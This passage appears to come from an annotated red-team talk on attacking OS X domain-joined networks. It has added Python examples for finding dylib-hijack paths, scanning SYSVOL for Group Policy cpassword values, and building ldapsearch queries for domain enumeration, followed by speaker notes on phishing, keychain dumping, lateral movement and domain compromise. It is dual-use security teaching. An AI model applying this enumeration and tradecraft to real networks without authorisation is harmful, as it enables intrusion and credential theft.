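    rpaths = [c["path"] for c in cmds if c.get("cmd") == "LC_RPATH"]
    findings = []
    for c in cmds:
        kind, name = c.get("cmd"), c.get("name")
        if kind not in ("LC_LOAD_DYLIB", "LC_LOAD_WEAK_DYLIB"):
            continue
        if name.startswith("@rpath/"):
            tried = [rp + "/" + name[len("@rpath/"):] for rp in rpaths]
            hit = next((i for i, p in enumerate(tried) if p in present), None)
            if hit is None:
                # a non-weak @rpath library that exists nowhere would stop the
                # binary from loading at all, so only the weak case is reported
                if kind == "LC_LOAD_WEAK_DYLIB" and tried:
                    findings.append(("weak-missing", name, tried[0]))
                continue
            for p in tried[:hit]:
                findings.append(("rpath-order", name, p))
        elif kind == "LC_LOAD_WEAK_DYLIB" and name not in present:
            findings.append(("weak-missing", name, name))
    return findings


if __name__ == "__main__":
    for finding in find_hijack_candidates(OTOOL_L, PRESENT):
        print(finding)
```

For each reported path the remediation question is simply whether an unprivileged user can create a file there; fixing the binary means shipping the library in the first LC_RPATH directory or dropping the unnecessary weak import, which removes the precondition rather than relying on permissions.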
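Slide 35 points at the Group Policy Preferences problem (MS14-025): preference items that set a local account password store it as a cpassword attribute in XML files under SYSVOL, readable by every domain user. The patch stops GPMC from creating new ones but leaves existing files in place, so the defender's job is to find them. The scanner below is an added example, not EmPyre code and not the linked Gpprefdecrypt.py: it only locates the attribute and never decrypts it. The two XML files are constructed and their policy GUIDs are placeholder values; a real run would walk the Policies folder of the SYSVOL share instead of this dict.

```python
"""Scan Group Policy Preference XML files for the cpassword attribute that
slide 35 describes.  Added defender example, not EmPyre code; the file
contents are constructed and the policy GUIDs are placeholders."""
import xml.etree.ElementTree as ET

# Account-name attribute used by each preference type that can store a
# password (Groups, Services, Scheduled Tasks, Data Sources, Drives, Printers).
ACCOUNT_ATTRS = ("userName", "accountName", "runAs", "username")

# Constructed SYSVOL contents, keyed by path relative to the Policies folder.
SYSVOL_FILES = {
    "{00000000-0000-0000-0000-000000000001}/Machine/Preferences/Groups/Groups.xml": """\
<?xml version="1.0" encoding="utf-8"?>
<Groups>
  <User name="LocalAdmin" changed="2015-05-01 10:00:00">
    <Properties action="U" userName="LocalAdmin"
                cpassword="CONSTRUCTED-NOT-A-REAL-CPASSWORD=" noChange="1" neverExpires="1"/>
  </User>
  <User name="Auditor" changed="2015-05-01 10:05:00">
    <Properties action="U" userName="Auditor" cpassword="" changeLogon="1"/>
  </User>
</Groups>
""",
    "{00000000-0000-0000-0000-000000000002}/Machine/Preferences/ScheduledTasks/ScheduledTasks.xml": """\
<?xml version="1.0" encoding="utf-8"?>
<ScheduledTasks>
  <Task name="NightlyBackup" changed="2014-03-10 08:30:00">
    <Properties action="C" runAs="CORP\\svc_backup" appName="backup.exe"
                cpassword="CONSTRUCTED-NOT-A-REAL-CPASSWORD="/>
  </Task>
</ScheduledTasks>
""",
}


def scan_gpp(files):
    """Return (path, item type, account) for every non-empty cpassword.
    An empty cpassword attribute carries nothing to recover and is skipped."""
    findings = []
    for path, text in files.items():
        root = ET.fromstring(text.encode("utf-8"))
        for item in root:                      # <User>, <Task>, <NTService>, ...
            for props in item.iter("Properties"):
                if not props.get("cpassword"):
                    continue
                account = next((props.get(a) for a in ACCOUNT_ATTRS
                                if props.get(a)), item.get("name"))
                findings.append((path, item.tag, account))
    return findings


def affected_policies(findings):
    """The GPO GUIDs whose XML needs the item removed.  The accounts named in
    the findings also need a password rotation: anyone with domain read access
    could already have recovered the old value."""
    return sorted({path.split("/", 1)[0] for path, _, _ in findings})


if __name__ == "__main__":
    hits = scan_gpp(SYSVOL_FILES)
    for hit in hits:
        print("cpassword in %s: %s %s" % hit)
    print("policies to clean:", affected_policies(hits))
```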
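Slides 36 and 37, together with Editor's Notes 14 and 15, describe the two-step pattern behind the Active Directory modules on slide 34: locate a domain controller with a single DNS lookup, then bind to it with ldapsearch. The block below is an added example and not EmPyre code: it parses a constructed `nslookup -type=SRV` transcript, orders the controllers the way a client should try them, and assembles an ldapsearch argument vector for the object types slide 34's get_* modules cover. corp.example and the "reader" account are placeholders, and nothing in the block touches the network.

```python
"""Find the domain controllers for an LDAP bind the way Editor's Note 15
describes (one SRV lookup) and assemble the ldapsearch call Note 14 refers
to.  Added example, not EmPyre code; the nslookup transcript is constructed,
corp.example and "reader" are placeholders, and nothing here touches the
network."""
import re

DOMAIN = "corp.example"   # placeholder domain

# Constructed output of: nslookup -type=SRV _ldap._tcp.dc._msdcs.corp.example
NSLOOKUP_OUTPUT = """\
Server:\t\t10.0.0.2
Address:\t10.0.0.2#53

_ldap._tcp.dc._msdcs.corp.example\tservice = 0 100 389 dc01.corp.example.
_ldap._tcp.dc._msdcs.corp.example\tservice = 10 100 389 dc02.corp.example.
_ldap._tcp.dc._msdcs.corp.example\tservice = 0 200 389 dc03.corp.example.
"""

# nslookup prints SRV data as "service = <priority> <weight> <port> <target>."
SRV_LINE = re.compile(r"service\s*=\s*(\d+)\s+(\d+)\s+(\d+)\s+(\S+?)\.?$")

# Filters matching the get_* modules on slide 34; the DC filter tests the
# SERVER_TRUST_ACCOUNT bit (8192) of userAccountControl with the bitwise-AND
# matching rule OID.
FILTERS = {
    "computers": "(objectCategory=computer)",
    "domaincontrollers": "(userAccountControl:1.2.840.113556.1.4.803:=8192)",
    "users": "(&(objectCategory=person)(objectClass=user))",
    "groups": "(objectCategory=group)",
}


def srv_name(domain):
    """The SRV record every domain-joined client resolves to locate a DC."""
    return "_ldap._tcp.dc._msdcs." + domain


def parse_srv(output):
    """Return [(host, port)] in the order a client should try them: lowest
    priority first, higher weight first within the same priority."""
    records = []
    for line in output.splitlines():
        m = SRV_LINE.search(line)
        if m:
            prio, weight, port, target = m.groups()
            records.append((int(prio), -int(weight), target, int(port)))
    records.sort()
    return [(target, port) for _, _, target, port in records]


def base_dn(domain):
    """corp.example -> DC=corp,DC=example"""
    return ",".join("DC=" + label for label in domain.split("."))


def ldapsearch_args(dc, domain, user, ldap_filter, *attrs):
    """argv for a read-only simple-bind query.  -W prompts for the password
    so it never lands in argv or shell history."""
    host, port = dc
    return ["ldapsearch", "-LLL", "-H", "ldap://%s:%d" % (host, port),
            "-x", "-W", "-D", "%s@%s" % (user, domain),
            "-b", base_dn(domain), ldap_filter] + list(attrs)


if __name__ == "__main__":
    dcs = parse_srv(NSLOOKUP_OUTPUT)
    print(srv_name(DOMAIN), "->", dcs)
    print(" ".join(ldapsearch_args(dcs[0], DOMAIN, "reader",
                                   FILTERS["computers"],
                                   "dNSHostName", "operatingSystem")))
```

From the monitoring side the SRV lookup itself is noise, since every domain-joined Mac performs it at logon; what stands out in DC logs is a workstation issuing the full set of enumeration filters above in quick succession over a simple bind.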

Editor's Notes

  1. Steve starts talking
  2. Introduce ourselves
  3. As a Penetration Tester or Red Teamer, the path to Domain Administrator in many environments may seem all too easy or “cookie cutter” these days. But what happens when you engage a high-security client with an OS X-heavy environment? Do you turn down the engagement or accept the challenge and up your game? This talk explores such a scenario and how testers can utilize various tools, techniques, and lessons-learned to successfully perform a complete assessment in an OS X domain-joined environment. We will cover a custom-built OS X/Linux agent and its associated tradecraft, from gaining initial access, to post-exploitation, lateral spread, persistence, and domain compromise.
  4. Keep in mind, methodologies stay the same for OS X; tradecraft may change. Explain, e.g. "How do we gain access in OS X?" SSH/phishing.
  5. Different operating systems present their own lateral spread challenges. (Linux: no SMB, WMI, PowerShell) (Windows: no SSH; OS X doesn't have net commands)
  6. Alex starts. Familiar interface for Empire users.
  7. Currently, we have two payloads for phishing.
  8. Talk about tradecraft as a whole. This is post-exploitation enumeration.
  9. Keychain Dump - no El Capitan YET
  10. Currently saves to target in an unencrypted format.
  11. Talk about how messages are stored unencrypted in a database
  12. Currently, only dumps history. Useful for hunting internal web services.
  13. Steve Starts
  14. Utilizes “ldapsearch” for AD enumeration
  15. In order to perform LDAP queries we’ll need to start off by finding the domain controller that we are going to bind our LDAP queries to. One quick solution is a single nslookup query.
  16. During most penetration tests, you may find yourself moving from host to host using common techniques such as PSEXEC, WMI or RDP. Operating in an OS X environment presents challenges as these methods may not be available.